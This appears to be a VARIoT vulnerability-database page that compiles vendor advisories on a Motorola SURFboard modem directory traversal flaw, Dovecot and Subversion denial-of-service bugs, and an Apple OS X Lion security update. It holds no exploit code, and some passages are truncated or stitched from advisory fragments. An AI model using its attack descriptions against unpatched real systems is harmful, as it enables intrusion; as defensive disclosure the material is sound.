VARIoT IoT vulnerabilities database

VAR-201006-0378 | CVE-2010-2307 | Motorola SBV6120E SURFboard Digital Voice Modem Directory Traversal Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Multiple directory traversal vulnerabilities in the web server for Motorola SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow remote attackers to read arbitrary files via (1) "//" (multiple leading slash), (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request. The Motorola SBV6120E SURFboard Digital Voice Modem is a combined data and voice cable modem. It does not correctly filter user-submitted URI requests, so remote attackers can exploit the vulnerability to read system files with the web server's permissions.
Exploiting this issue can allow an attacker to obtain sensitive information that may aid in further attacks.
TITLE:
Motorola SURFBoard SBV6120E Directory Traversal Vulnerability
SECUNIA ADVISORY ID:
SA40054
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/40054/
RELEASE DATE:
2010-06-09
DESCRIPTION:
A vulnerability has been reported in Motorola SURFBoard SBV6120E,
which can be exploited by malicious people to disclose potentially
sensitive information.
The vulnerability is caused by an error when handling certain
HTTP requests. This can be exploited to e.g.
The vulnerability is reported in firmware version
SBV6X2X-1.0.0.5-SCM-02-SHPC. Other versions may also be affected.
SOLUTION:
Filter malicious requests using a proxy.
PROVIDED AND/OR DISCOVERED BY:
S2 Crew
ORIGINAL ADVISORY:
http://www.exploit-db.com/exploits/12865/
VAR-201105-0095 | CVE-2011-1929 | Dovecot of lib-mail/message-header-parser.c Service disruption in (DoS) Vulnerabilities |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
lib-mail/message-header-parser.c in Dovecot 1.2.x before 1.2.17 and 2.0.x before 2.0.13 does not properly handle '\0' characters in header names, which allows remote attackers to cause a denial of service (daemon crash or mailbox corruption) via a crafted e-mail message. Dovecot is an open source IMAP and POP3 server for Linux/UNIX-like systems. Dovecot is prone to a denial-of-service vulnerability because it fails to properly parse message headers.
A remote attacker can exploit this issue to crash the affected application, denying service to legitimate users.
Dovecot versions prior to 1.2.17 and 2.0.13 are vulnerable.
=====================================================================
Red Hat Security Advisory
Synopsis: Moderate: dovecot security update
Advisory ID: RHSA-2011:1187-01
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2011-1187.html
Issue date: 2011-08-18
CVE Names: CVE-2011-1929
=====================================================================
1. Summary:
Updated dovecot packages that fix one security issue are now available for
Red Hat Enterprise Linux 4, 5, and 6.
The Red Hat Security Response Team has rated this update as having moderate
security impact. A Common Vulnerability Scoring System (CVSS) base score,
which gives a detailed severity rating, is available from the CVE link in
the References section.
2. Relevant releases/architectures:
RHEL Desktop Workstation (v. 5 client) - i386, x86_64
Red Hat Enterprise Linux (v. 5 server) - i386, ia64, ppc, s390x, x86_64
Red Hat Enterprise Linux AS version 4 - i386, ia64, ppc, s390, s390x, x86_64
Red Hat Enterprise Linux Desktop version 4 - i386, x86_64
Red Hat Enterprise Linux ES version 4 - i386, ia64, x86_64
Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux WS version 4 - i386, ia64, x86_64
Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64
3. Description:
(CVE-2011-1929)
Users of dovecot are advised to upgrade to these updated packages, which
contain a backported patch to resolve this issue. After installing the
updated packages, the dovecot service will be restarted automatically.
4. Solution:
Before applying this update, make sure all previously-released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/kb/docs/DOC-11259
5. Bugs fixed (http://bugzilla.redhat.com/):
706286 - CVE-2011-1929 dovecot: potential crash when parsing header names that contain NUL characters
6. Package List:
Red Hat Enterprise Linux AS version 4:
Source:
ftp://updates.redhat.com/enterprise/4AS/en/os/SRPMS/dovecot-0.99.11-10.EL4.src.rpm
i386:
dovecot-0.99.11-10.EL4.i386.rpm
dovecot-debuginfo-0.99.11-10.EL4.i386.rpm
ia64:
dovecot-0.99.11-10.EL4.ia64.rpm
dovecot-debuginfo-0.99.11-10.EL4.ia64.rpm
ppc:
dovecot-0.99.11-10.EL4.ppc.rpm
dovecot-debuginfo-0.99.11-10.EL4.ppc.rpm
s390:
dovecot-0.99.11-10.EL4.s390.rpm
dovecot-debuginfo-0.99.11-10.EL4.s390.rpm
s390x:
dovecot-0.99.11-10.EL4.s390x.rpm
dovecot-debuginfo-0.99.11-10.EL4.s390x.rpm
x86_64:
dovecot-0.99.11-10.EL4.x86_64.rpm
dovecot-debuginfo-0.99.11-10.EL4.x86_64.rpm
Red Hat Enterprise Linux Desktop version 4:
Source:
ftp://updates.redhat.com/enterprise/4Desktop/en/os/SRPMS/dovecot-0.99.11-10.EL4.src.rpm
i386:
dovecot-0.99.11-10.EL4.i386.rpm
dovecot-debuginfo-0.99.11-10.EL4.i386.rpm
x86_64:
dovecot-0.99.11-10.EL4.x86_64.rpm
dovecot-debuginfo-0.99.11-10.EL4.x86_64.rpm
Red Hat Enterprise Linux ES version 4:
Source:
ftp://updates.redhat.com/enterprise/4ES/en/os/SRPMS/dovecot-0.99.11-10.EL4.src.rpm
i386:
dovecot-0.99.11-10.EL4.i386.rpm
dovecot-debuginfo-0.99.11-10.EL4.i386.rpm
ia64:
dovecot-0.99.11-10.EL4.ia64.rpm
dovecot-debuginfo-0.99.11-10.EL4.ia64.rpm
x86_64:
dovecot-0.99.11-10.EL4.x86_64.rpm
dovecot-debuginfo-0.99.11-10.EL4.x86_64.rpm
Red Hat Enterprise Linux WS version 4:
Source:
ftp://updates.redhat.com/enterprise/4WS/en/os/SRPMS/dovecot-0.99.11-10.EL4.src.rpm
i386:
dovecot-0.99.11-10.EL4.i386.rpm
dovecot-debuginfo-0.99.11-10.EL4.i386.rpm
ia64:
dovecot-0.99.11-10.EL4.ia64.rpm
dovecot-debuginfo-0.99.11-10.EL4.ia64.rpm
x86_64:
dovecot-0.99.11-10.EL4.x86_64.rpm
dovecot-debuginfo-0.99.11-10.EL4.x86_64.rpm
RHEL Desktop Workstation (v. 5 client):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Client/en/os/SRPMS/dovecot-1.0.7-7.el5_7.1.src.rpm
i386:
dovecot-1.0.7-7.el5_7.1.i386.rpm
dovecot-debuginfo-1.0.7-7.el5_7.1.i386.rpm
x86_64:
dovecot-1.0.7-7.el5_7.1.x86_64.rpm
dovecot-debuginfo-1.0.7-7.el5_7.1.x86_64.rpm
Red Hat Enterprise Linux (v. 5 server):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Server/en/os/SRPMS/dovecot-1.0.7-7.el5_7.1.src.rpm
i386:
dovecot-1.0.7-7.el5_7.1.i386.rpm
dovecot-debuginfo-1.0.7-7.el5_7.1.i386.rpm
ia64:
dovecot-1.0.7-7.el5_7.1.ia64.rpm
dovecot-debuginfo-1.0.7-7.el5_7.1.ia64.rpm
ppc:
dovecot-1.0.7-7.el5_7.1.ppc.rpm
dovecot-debuginfo-1.0.7-7.el5_7.1.ppc.rpm
s390x:
dovecot-1.0.7-7.el5_7.1.s390x.rpm
dovecot-debuginfo-1.0.7-7.el5_7.1.s390x.rpm
x86_64:
dovecot-1.0.7-7.el5_7.1.x86_64.rpm
dovecot-debuginfo-1.0.7-7.el5_7.1.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/dovecot-2.0.9-2.el6_1.1.src.rpm
i386:
dovecot-2.0.9-2.el6_1.1.i686.rpm
dovecot-debuginfo-2.0.9-2.el6_1.1.i686.rpm
dovecot-mysql-2.0.9-2.el6_1.1.i686.rpm
dovecot-pgsql-2.0.9-2.el6_1.1.i686.rpm
dovecot-pigeonhole-2.0.9-2.el6_1.1.i686.rpm
ppc64:
dovecot-2.0.9-2.el6_1.1.ppc.rpm
dovecot-2.0.9-2.el6_1.1.ppc64.rpm
dovecot-debuginfo-2.0.9-2.el6_1.1.ppc.rpm
dovecot-debuginfo-2.0.9-2.el6_1.1.ppc64.rpm
dovecot-mysql-2.0.9-2.el6_1.1.ppc64.rpm
dovecot-pgsql-2.0.9-2.el6_1.1.ppc64.rpm
dovecot-pigeonhole-2.0.9-2.el6_1.1.ppc64.rpm
s390x:
dovecot-2.0.9-2.el6_1.1.s390.rpm
dovecot-2.0.9-2.el6_1.1.s390x.rpm
dovecot-debuginfo-2.0.9-2.el6_1.1.s390.rpm
dovecot-debuginfo-2.0.9-2.el6_1.1.s390x.rpm
dovecot-mysql-2.0.9-2.el6_1.1.s390x.rpm
dovecot-pgsql-2.0.9-2.el6_1.1.s390x.rpm
dovecot-pigeonhole-2.0.9-2.el6_1.1.s390x.rpm
x86_64:
dovecot-2.0.9-2.el6_1.1.i686.rpm
dovecot-2.0.9-2.el6_1.1.x86_64.rpm
dovecot-debuginfo-2.0.9-2.el6_1.1.i686.rpm
dovecot-debuginfo-2.0.9-2.el6_1.1.x86_64.rpm
dovecot-mysql-2.0.9-2.el6_1.1.x86_64.rpm
dovecot-pgsql-2.0.9-2.el6_1.1.x86_64.rpm
dovecot-pigeonhole-2.0.9-2.el6_1.1.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/dovecot-2.0.9-2.el6_1.1.src.rpm
i386:
dovecot-debuginfo-2.0.9-2.el6_1.1.i686.rpm
dovecot-devel-2.0.9-2.el6_1.1.i686.rpm
ppc64:
dovecot-debuginfo-2.0.9-2.el6_1.1.ppc64.rpm
dovecot-devel-2.0.9-2.el6_1.1.ppc64.rpm
s390x:
dovecot-debuginfo-2.0.9-2.el6_1.1.s390x.rpm
dovecot-devel-2.0.9-2.el6_1.1.s390x.rpm
x86_64:
dovecot-debuginfo-2.0.9-2.el6_1.1.x86_64.rpm
dovecot-devel-2.0.9-2.el6_1.1.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/dovecot-2.0.9-2.el6_1.1.src.rpm
i386:
dovecot-2.0.9-2.el6_1.1.i686.rpm
dovecot-debuginfo-2.0.9-2.el6_1.1.i686.rpm
dovecot-mysql-2.0.9-2.el6_1.1.i686.rpm
dovecot-pgsql-2.0.9-2.el6_1.1.i686.rpm
dovecot-pigeonhole-2.0.9-2.el6_1.1.i686.rpm
x86_64:
dovecot-2.0.9-2.el6_1.1.i686.rpm
dovecot-2.0.9-2.el6_1.1.x86_64.rpm
dovecot-debuginfo-2.0.9-2.el6_1.1.i686.rpm
dovecot-debuginfo-2.0.9-2.el6_1.1.x86_64.rpm
dovecot-mysql-2.0.9-2.el6_1.1.x86_64.rpm
dovecot-pgsql-2.0.9-2.el6_1.1.x86_64.rpm
dovecot-pigeonhole-2.0.9-2.el6_1.1.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/dovecot-2.0.9-2.el6_1.1.src.rpm
i386:
dovecot-debuginfo-2.0.9-2.el6_1.1.i686.rpm
dovecot-devel-2.0.9-2.el6_1.1.i686.rpm
x86_64:
dovecot-debuginfo-2.0.9-2.el6_1.1.x86_64.rpm
dovecot-devel-2.0.9-2.el6_1.1.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2011-1929.html
https://access.redhat.com/security/updates/classification/#moderate
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2011 Red Hat, Inc.
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201110-04
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: High
Title: Dovecot: Multiple vulnerabilities
Date: October 10, 2011
Bugs: #286844, #293954, #314533, #368653
ID: 201110-04
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities were found in Dovecot, the worst of which
allowing for remote execution of arbitrary code.
Affected packages
=================
-------------------------------------------------------------------
     Package              /  Vulnerable  /                   Unaffected
-------------------------------------------------------------------
  1  net-mail/dovecot         < 2.0.13                     *>= 1.2.17
                                                            >= 2.0.13
Description
===========
Multiple vulnerabilities have been discovered in Dovecot. Please review
the CVE identifiers referenced below for details.
Impact
======
A remote attacker could exploit these vulnerabilities to cause the
remote execution of arbitrary code, or a Denial of Service condition,
to conduct directory traversal attacks, corrupt data, or disclose
information.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Dovecot 1 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-mail/dovecot-1.2.17"
All Dovecot 2 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-mail/dovecot-2.0.13"
NOTE: This is a legacy GLSA. Updates for all affected architectures are
available since May 28, 2011. It is likely that your system is already
no longer affected by this issue.
References
==========
[ 1 ] CVE-2009-3235
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3235
[ 2 ] CVE-2009-3897
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3897
[ 3 ] CVE-2010-0745
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0745
[ 4 ] CVE-2010-3304
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3304
[ 5 ] CVE-2010-3706
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3706
[ 6 ] CVE-2010-3707
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3707
[ 7 ] CVE-2010-3779
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3779
[ 8 ] CVE-2010-3780
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3780
[ 9 ] CVE-2011-1929
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1929
[ 10 ] CVE-2011-2166
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2166
[ 11 ] CVE-2011-2167
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2167
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201110-04.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2011 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
Packages for 2009.0 are provided as of the Extended Maintenance
Program. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
==========================================================================
Ubuntu Security Notice USN-1143-1
June 02, 2011
dovecot vulnerability
==========================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 11.04
- Ubuntu 10.10
- Ubuntu 10.04 LTS
Summary:
An attacker could send a crafted email message that could disrupt email
service.
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 11.04:
dovecot-common 1:1.2.15-3ubuntu2.1
Ubuntu 10.10:
dovecot-common 1:1.2.12-1ubuntu8.2
Ubuntu 10.04 LTS:
dovecot-common 1:1.2.9-1ubuntu6.4
In general, a standard system update will make all the necessary changes.
The oldstable distribution (lenny) is not affected.
For the stable distribution (squeeze), this problem has been fixed in
version 1.2.15-7.
For the unstable distribution (sid), this problem has been fixed in
version 2.0.13-1
VAR-201106-0192 | CVE-2011-1783 | Apache Subversion Used in Apache HTTP Server Service disruption in (DoS) Vulnerabilities |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x and 1.6.x before 1.6.17, when the SVNPathAuthz short_circuit option is enabled, allows remote attackers to cause a denial of service (infinite loop and memory consumption) in opportunistic circumstances by requesting data. The server is fast, reliable and extensible through a simple API.
The mod_dav_svn Apache HTTPD server module may in certain scenarios
enter a logic loop which does not exit and which allocates memory in
each iteration, ultimately exhausting all the available memory on the
server, which can lead to a DoS (Denial of Service) (CVE-2011-1783).
The mod_dav_svn Apache HTTPD server module may leak to remote users
the contents of files configured to be unreadable by those users
(CVE-2011-1921).
Packages for 2009.0 are provided as of the Extended Maintenance
Program. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
APPLE-SA-2012-02-01-1 OS X Lion v10.7.3 and Security Update 2012-001
OS X Lion v10.7.3 and Security Update 2012-001 is now available and
addresses the following:
Address Book
Available for: OS X Lion v10.7 to v10.7.2,
OS X Lion Server v10.7 to v10.7.2
Impact: An attacker in a privileged network position may intercept
CardDAV data
Description: Address Book supports Secure Sockets Layer (SSL) for
accessing CardDAV. A downgrade issue caused Address Book to attempt
an unencrypted connection if an encrypted connection failed. An
attacker in a privileged network position could abuse this behavior
to intercept CardDAV data. This issue is addressed by not downgrading
to an unencrypted connection without user approval.
CVE-ID
CVE-2011-3444 : Bernard Desruisseaux of Oracle Corporation
Apache
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2
Impact: Multiple vulnerabilities in Apache
Description: Apache is updated to version 2.2.21 to address several
vulnerabilities, the most serious of which may lead to a denial of
service. Further information is available via the Apache web site at
http://httpd.apache.org/
CVE-ID
CVE-2011-3348
Apache
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2
Impact: An attacker may be able to decrypt data protected by SSL
Description: There are known attacks on the confidentiality of SSL
3.0 and TLS 1.0 when a cipher suite uses a block cipher in CBC mode.
Apache disabled the 'empty fragment' countermeasure which prevented
these attacks. This issue is addressed by providing a configuration
parameter to control the countermeasure and enabling it by default.
CVE-ID
CVE-2011-3389
CFNetwork
Available for: OS X Lion v10.7 to v10.7.2,
OS X Lion Server v10.7 to v10.7.2
Impact: Visiting a maliciously crafted website may lead to the
disclosure of sensitive information
Description: An issue existed in CFNetwork's handling of malformed
URLs. When accessing a maliciously crafted URL, CFNetwork could send
the request to an incorrect origin server. This issue does not affect
systems prior to OS X Lion.
CVE-ID
CVE-2011-3246 : Erling Ellingsen of Facebook
CFNetwork
Available for: OS X Lion v10.7 to v10.7.2,
OS X Lion Server v10.7 to v10.7.2
Impact: Visiting a maliciously crafted website may lead to the
disclosure of sensitive information
Description: An issue existed in CFNetwork's handling of malformed
URLs. When accessing a maliciously crafted URL, CFNetwork could send
unexpected request headers. This issue does not affect systems prior
to OS X Lion.
CVE-ID
CVE-2011-3447 : Erling Ellingsen of Facebook
ColorSync
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8
Impact: Viewing a maliciously crafted image with an embedded
ColorSync profile may lead to an unexpected application termination
or arbitrary code execution
Description: An integer overflow existed in the handling of images
with an embedded ColorSync profile, which may lead to a heap buffer
overflow. This issue does not affect OS X Lion systems.
CVE-ID
CVE-2011-0200 : binaryproof working with TippingPoint's Zero Day
Initiative
CoreAudio
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8
Impact: Playing maliciously crafted audio content may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of AAC
encoded audio streams. This issue does not affect OS X Lion systems.
CVE-ID
CVE-2011-3252 : Luigi Auriemma working with TippingPoint's Zero Day
Initiative
CoreMedia
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2
Impact: Viewing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: A heap buffer overflow existed in CoreMedia's handling
of H.264 encoded movie files.
CVE-ID
CVE-2011-3448 : Scott Stender of iSEC Partners
CoreText
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2
Impact: Viewing or downloading a document containing a maliciously
crafted embedded font may lead to an unexpected application
termination or arbitrary code execution
Description: A use after free issue existed in the handling of font
files.
CVE-ID
CVE-2011-3449 : Will Dormann of the CERT/CC
CoreUI
Available for: OS X Lion v10.7 to v10.7.2,
OS X Lion Server v10.7 to v10.7.2
Impact: Visiting a malicious website may lead to an unexpected
application termination or arbitrary code execution
Description: An unbounded stack allocation issue existed in the
handling of long URLs. This issue does not affect systems prior to OS
X Lion.
CVE-ID
CVE-2011-3450 : Ben Syverson
curl
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2
Impact: A remote server may be able to impersonate clients via
GSSAPI requests
Description: When doing GSSAPI authentication, libcurl
unconditionally performs credential delegation. This issue is
addressed by disabling GSSAPI credential delegation.
CVE-ID
CVE-2011-2192
Data Security
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2
Impact: An attacker with a privileged network position may intercept
user credentials or other sensitive information
Description: Two certificate authorities in the list of trusted root
certificates have independently issued intermediate certificates to
DigiCert Malaysia. DigiCert Malaysia has issued certificates with
weak keys that it is unable to revoke. An attacker with a privileged
network position could intercept user credentials or other sensitive
information intended for a site with a certificate issued by DigiCert
Malaysia. This issue is addressed by configuring default system trust
settings so that DigiCert Malaysia's certificates are not trusted. We
would like to acknowledge Bruce Morton of Entrust, Inc. for reporting
this issue.
dovecot
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2
Impact: An attacker may be able to decrypt data protected by SSL
Description: There are known attacks on the confidentiality of SSL
3.0 and TLS 1.0 when a cipher suite uses a block cipher in CBC mode.
Dovecot disabled the 'empty fragment' countermeasure which prevented
these attacks. This issue is addressed by enabling the
countermeasure.
CVE-ID
CVE-2011-3389 : Apple
filecmds
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2
Impact: Decompressing a maliciously crafted compressed file may lead
to an unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the 'uncompress' command
line tool.
CVE-ID
CVE-2011-2895
ImageIO
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8
Impact: Viewing a maliciously crafted TIFF file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in ImageIO's handling of
CCITT Group 4 encoded TIFF files. This issue does not affect OS X
Lion systems.
CVE-ID
CVE-2011-0241 : Cyril CATTIAUX of Tessi Technologies
ImageIO
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2
Impact: Viewing a maliciously crafted TIFF file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in libtiff's handling of
ThunderScan encoded TIFF images. This issue is addressed by updating
libtiff to version 3.9.5.
CVE-ID
CVE-2011-1167
ImageIO
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2
Impact: Multiple vulnerabilities in libpng 1.5.4
Description: libpng is updated to version 1.5.5 to address multiple
vulnerabilities, the most serious of which may lead to arbitrary code
execution. Further information is available via the libpng website at
http://www.libpng.org/pub/png/libpng.html
CVE-ID
CVE-2011-3328
Internet Sharing
Available for: OS X Lion v10.7 to v10.7.2,
OS X Lion Server v10.7 to v10.7.2
Impact: A Wi-Fi network created by Internet Sharing may lose
security settings after a system update
Description: After updating to a version of OS X Lion prior to
10.7.3, the Wi-Fi configuration used by Internet Sharing may revert
to factory defaults, which disables the WEP password. This issue only
affects systems with Internet Sharing enabled and sharing the
connection to Wi-Fi. This issue is addressed by preserving the Wi-Fi
configuration during a system update.
CVE-ID
CVE-2011-3452 : an anonymous researcher
Libinfo
Available for: OS X Lion v10.7 to v10.7.2,
OS X Lion Server v10.7 to v10.7.2
Impact: Visiting a maliciously crafted website may lead to the
disclosure of sensitive information
Description: An issue existed in Libinfo's handling of hostname
lookup requests. Libinfo could return incorrect results for a
maliciously crafted hostname. This issue does not affect systems
prior to OS X Lion.
CVE-ID
CVE-2011-3441 : Erling Ellingsen of Facebook
libresolv
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2
Impact: Applications that use OS X's libresolv library may be
vulnerable to an unexpected application termination or arbitrary code
execution
Description: An integer overflow existed in the parsing of DNS
resource records, which may lead to heap memory corruption.
CVE-ID
CVE-2011-3453 : Ilja van Sprundel of IOActive
libsecurity
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2
Impact: Some EV certificates may be trusted even if the
corresponding root has been marked as untrusted
Description: The certificate code trusted a root certificate to sign
EV certificates if it was on the list of known EV issuers, even if
the user had marked it as 'Never Trust' in Keychain. The root would
not be trusted to sign non-EV certificates.
CVE-ID
CVE-2011-3422 : Alastair Houghton
OpenGL
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2
Impact: Applications that use OS X's OpenGL implementation may be
vulnerable to an unexpected application termination or arbitrary code
execution
Description: Multiple memory corruption issues existed in the
handling of GLSL compilation.
CVE-ID
CVE-2011-3457 : Chris Evans of the Google Chrome Security Team, and
Marc Schoenefeld of the Red Hat Security Response Team
PHP
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2
Impact: Multiple vulnerabilities in PHP 5.3.6
Description: PHP is updated to version 5.3.8 to address several
vulnerabilities, the most serious of which may lead to arbitrary code
execution. Further information is available via the PHP web site at
http://www.php.net
CVE-ID
CVE-2011-1148
CVE-2011-1657
CVE-2011-1938
CVE-2011-2202
CVE-2011-2483
CVE-2011-3182
CVE-2011-3189
CVE-2011-3267
CVE-2011-3268
PHP
Available for: OS X Lion v10.7 to v10.7.2,
OS X Lion Server v10.7 to v10.7.2
Impact: Viewing a maliciously crafted PDF file may lead to an
unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in FreeType's
handling of Type 1 fonts. This issue is addressed by updating
FreeType to version 2.4.7. Further information is available via the
FreeType site at http://www.freetype.org/
CVE-ID
CVE-2011-3256 : Apple
PHP
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2
Impact: Multiple vulnerabilities in libpng 1.5.4
Description: libpng is updated to version 1.5.5 to address multiple
vulnerabilities, the most serious of which may lead to arbitrary code
execution. Further information is available via the libpng website at
http://www.libpng.org/pub/png/libpng.html
CVE-ID
CVE-2011-3328
QuickTime
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2
Impact: Opening a maliciously crafted MP4 encoded file may lead to
an unexpected application termination or arbitrary code execution
Description: An uninitialized memory access issue existed in the
handling of MP4 encoded files.
CVE-ID
CVE-2011-3458 : Luigi Auriemma and pa_kt both working with
TippingPoint's Zero Day Initiative
QuickTime
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2
Impact: Viewing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: A signedness issue existed in the handling of font
tables embedded in QuickTime movie files.
CVE-ID
CVE-2011-3248 : Luigi Auriemma working with TippingPoint's Zero Day
Initiative
QuickTime
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2
Impact: Viewing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: An off by one buffer overflow existed in the handling
of rdrf atoms in QuickTime movie files.
CVE-ID
CVE-2011-3459 : Luigi Auriemma working with TippingPoint's Zero Day
Initiative
QuickTime
